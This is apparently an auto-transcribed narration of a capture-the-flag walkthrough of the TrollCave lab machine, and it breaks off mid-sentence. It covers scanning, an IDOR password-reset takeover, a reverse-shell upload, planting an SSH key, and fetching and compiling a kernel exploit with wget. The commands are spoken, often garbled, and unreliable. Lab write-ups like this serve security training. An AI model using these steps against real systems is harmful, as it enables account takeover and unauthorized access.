Hello guys, welcome back to Appendices Lab. Today we're going to solve another CTF challenge named called TrollCave. So what is the basic penetration testing methodologies we use here? So the basic penetration testing methodologies we use here: network discovery, enumeration, exploitation, privilege escalation, and capture the flag. So first open the terminal. So first you just type sudo su and enter your password. Then you just type here net discover minus I is 0. So I identify my targeted mission is here. So then later you just type here nmap minus 34 minus a as an aggressive scan and enter the targeted IP address. That's it. So we have found one is available with SH, another one is available with Nginx server. So we would like to look here, come back here, 192.168.20, 18.20. So we got it as an TrollCave. So once you observe here, there is like Nginx as an TrollCave. There is no anything else. So we would like to analyze all those things here. So we would like to look here. It's on all posters. So first we would like to go with the directory poster. Just copy this one. Come back here. File. New tab. You just write here directory poster. Paste it. So let's see what else we can get here. So we got it as an admin. So we would like to look here. We go for admin. So in the admin place, you have to be logged in to do that. Okay. So we have users is like only me, anybody, home, XCRS, only me. That's it. So we don't have any type of users here. So we would like to look here as users. No have. We are getting again to be login. Okay, no worries. Now we would like to look here. I got it a robots.txt. Let me look what else useful information we can get here. Robots.txt. So in the robots.txt there is no useful information. Okay, we would like to leave that. Now, once we would like to close this login form also, we would like to look here. There is a block also. So I would like to look here in another tab using by users. One, as we would like to go here, users one is a key page. So I would like to look also as here, enter the targeted IP address, blocks also available. So I would like to study the block one. Nothing else. So we would like to go for 2. Nothing else. Hi, I am Dave. I'm an administration on this site and that makes me a better than you. Okay. So you need to do the enumeration of this targeted website. Okay, it's 3 is not coming. We would like to go for blocks, then go for 4. Nothing else here. We would like to go for 5. It's also nothing. We would like to go for blocks 6. So here we got it as a password reset. So I have been getting a lot of emails lately from users who forgot their passwords. I need to reset them because of the site does not have one of those forget a password buttons. I have been having to do all the resets manually. I'm getting really tired of it. Ergo, it's time to implement a password reset. Busy with that at the moment, but having a trouble with the site emails. So far I have implemented a password research resource in the Rails. So you consider it as a Rails, as a username. Okay. So we would like to copy this as a password results. Just copy, come back here, enter the targeted IP address. Then we would like to paste this, enter. The page you are looking for does not exist. Okay, no worries. Just copy this one, come back here again with the directory buster, pasted this. We would like to look here again. So now we are going to hunt the range password. We would like to reset the range password. So our target is now range, and it's about 90% working except the email thing. So I would like to take as Kings. Okay, I will copy this one also, no need. So first we would like to look here. So I got it, one is an edit here. We would like to look this edit, come back here. We just type here edit. So it's not having a right thing. Now I also got one more thing is a new. So we would like to go back to a new. We would like to look here. So now we would like to choose any one of the username for password. So I would like to concentrate here only. Online users like CoolDude89, XER, only me, anybody home. So I would like to choose as only me. So you can choose anyone, okay, XER or anybody. So you just click on reset. So we got the reset password link. So this is an email sent. So just open the link in new tab. So now I just come back here. So you just copy this, come back here. So you can see here IDOR exploit, IDOR vulnerability. So we have 5 in the targeted website. So we are changing the password directly here. Now you can see here password. You just need to enter your password. So I'm entering my password here. So you just need to put as in 10 characters. It's more better for a strong password authentication. Now just reset the password. Now you have successfully registered and you have login directly here. Now you can see. So some of the targeted in a real-time scenarios you can exploit in this way by IDOR. So when you look all those things is okay. So now we would like to look as a home. Now you just look this. The king is dead. Long live the king. So we would like to look the king. So we can see here file upload will be re-enabled once coder guy has addressed the security concerns around the functionalities. Okay, now we would like to go for admin panel. You just enable the file registration, just click on okay. Now you just go to a file manager, click on upload, go to home. So you have already a reverse shell. Just open here. So I would like to type here. You just type here, type clear. You just type here ifconfig. Now you just type here mousepad rshell.php. Now you have here 18.35. That's it. Now we would like to click on browse. You have uploaded here. Now just click on upload. So we have file uploaded successfully. Now you can look here file upload as rshell.php. So it's not coming here. So does not worry, no need to worry here. Now come back here. So now we would like to upload a file to get an reverse shell. So now we would like to here is, so now come back here again as browse file upload. So we just type here sh keygen minus type for RSA minus p for 2048. That's enough. Yes, yes. So we have successfully generated. So now I just type cd dot sh let's minus here. So I just type here. So I just remove, copy this one, paste it. Now we would like to do here is copy id underscore rsa dot pub to home Windows Cloud. That's it. Now we would like to go back here. So we would like to open this id underscore rsa pub. Now we would like to enter as we would like to go here 2, 3, 4, 5, 6. So now just type here home rails, then you just type sh, then you just type here authorized keys. So why should I need to use the rails? So once you come back here, so it was mentioned as an rails, so I just want to use the rails only. So just click on upload. So file which was uploaded successfully. Now just type here sh minus id underscore rsa. Now we just type here rails, enter the targeted IP address 192.168.18.20. Then it asks fingerprints, yes. So we are successfully logged in. You just type ID, we got it. You just type here who am I, we got it here. So now you just type here which Python, we got it here. You just type here Python minus C, import pdy spam bin bash. So we are successfully came here. So now just type here C, you just type here export term equal to x term. I just type here response here. So you would like to look everything coder guy minus here, nothing have cd dev minus here, nothing have cd dragon minus here, so no have cd king minus here. So in the king have a calc, only the one thing. So I would like to type here cat dot bash instance. So what he was done here. So paste it. So it's not permission is denied. So I would like to look also this one cat its permission is nothing have. Now come back here cd, you just type here rails minus here. So there is no any useful information to go further. So what we would like to do here is, so I just type here cd. So we just type here uname minus a. So I got it here as an exploit, as a generic 0.116. Just copy this one, file, new tab. You just type cd, you just type here clear, you just type here subsploit, then paste this one. So here we got Linux kernel event. So you just type here again subsploit minus m 44298.c. Just copy this one, paste it. So we have successfully got it here. So just type here Python minus m http dot So before that, I would like to type here ifconfig. Now just type here python minus m http dot server. Now we would like to go back here wg. So we would like to go to an temp directory. Let's minus here. So now just type here wget http. Enter the target IP address 192.168.18.35 and 800 what is this? So you just get it from here, copy, paste it. So we have successfully got it here. So now we just type here gcc minus o exploit. Now you would like to write as an if it comes this is exploit, and from this. So the program gcc is currently is not installed. So you just type here where is gcc. So cd user lib, let's minus here gcc. Okay, no worries. So we just go to attempt, we just type here clear. So if that is does not work out, we would like to do here one more time. Come back here, let's just type here gcc 44298.c. Oh, sorry, gcc output for exploit 44298.c. So we got it here. Just copy this one, come back here again, wget http, enter the targeted IP address 18.35 800 exploit less minus l. We just type here chmod plus x exploit. Now we just exploit this one. So lib x86 or 64 Linux GNU lib so version not found required by exploit. So it's not found. So even this exploit is not working out. So what we would like to do here is